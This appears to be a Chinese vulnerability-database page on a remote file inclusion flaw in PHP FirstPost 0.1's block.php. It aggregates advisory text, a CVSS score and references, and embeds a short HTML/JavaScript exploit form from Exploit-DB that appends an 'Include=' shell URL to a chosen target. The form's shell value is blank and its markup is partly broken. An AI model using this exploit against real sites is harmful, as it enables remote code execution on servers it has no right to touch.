发布时间 :2005-08-03 00:00:00
修订时间 :2016-10-17 23:26:43

[原文]PHP remote file inclusion vulnerability in block.php in PHP FirstPost allows remote attackers to execute arbitrary PHP code via the Include parameter.

[CNNVD]PHPFirstpost 'Block.PHP'远程文件包含漏洞 (CNNVD-200508-038)

        PHP FirstPost中的block.php文件存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于Internet参数执行任意的PHP代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20050724 PHP FirstPost remote file include vulnerability
(UNKNOWN)  BID  14371
(UNKNOWN)  XF  php-firstpost-block-file-include(21513)

- 漏洞信息

PHPFirstpost 'Block.PHP'远程文件包含漏洞
中危 输入验证
2005-08-03 00:00:00 2005-10-20 00:00:00
        PHP FirstPost中的block.php文件存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于Internet参数执行任意的PHP代码。

- 公告与补丁


- 漏洞信息 (3906)

PHP FirstPost 0.1 (block.php Include) Remote File Inclusion Exploit (EDBID:3906)
php webapps
2007-05-12 Verified
0 Dj7xpl
N/A [点击下载]
<title>..:: PhpFirstPost blog   Remote File Include Exploit ::..</title>

<script language="JavaScript">


      \\  - -  //
       (  @ @ )

[ Y! Underground Group ]
[   ]
[    ]

    (   )     (   )
     \ (       ) /
      \_)     (_/


[!] Portal   :   PhpFirstPost 0.1
[!] Download :
[!] Type     :   Remote File Include Exploit



 var path="/"
 var adress="block.php?" 
 var include ="Include=" 
 var phpshell="" 

 function command(){
     if (document.rfi.target1.value==""){
        alert("Exploit Failed...");
    return false;

rfi.action= document.rfi.target1.value+path+adress+include+phpshell;


<body bgcolor="#198ccd">

<form method="post" target="getting" name="rfi" onSubmit="command();">
  <b><font face="batangche" size="3" color="white">Target:</font><font
face="Arial" size="2"
<font color="#00FF00"size="+1" face="batangche">
<font color="red" size="2"></font></b>
<input type="text" name="target1" size="20" style="background-color:
white" onmouseover="'red';"
<input type="submit" value="Go -->" name="B1">
<input type="reset" value="Clear" name="B2"></p>
<iframe name="getting" height="337" width="633" scrolling="yes"
<p><font color="red" size="2" face="batang">Dj7xpl @ Yahoo . com </font></p>

# [2007-05-12]

- 漏洞信息

PHP FirstPost block.php Include Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

PHP FirstPost contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to block.php not properly sanitizing user input supplied to the Include variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2005-07-24 Unknow
2005-07-24 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

PHPFirstpost Block.PHP Remote File Include Vulnerability
Input Validation Error 14371
Yes No
2005-07-25 12:00:00 2007-05-30 12:03:00
][GB][ and Zetha are credited for the discovery of this vulnerability.

- 受影响的程序版本

PhpFirstPost PhpFirstPost 0.1

- 漏洞讨论

Phpfirstpost is prone to a remote PHP file-include vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may exploit this issue to execute arbitrary PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

- 漏洞利用

An exploit example has been provided:|command|

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at:

- 相关参考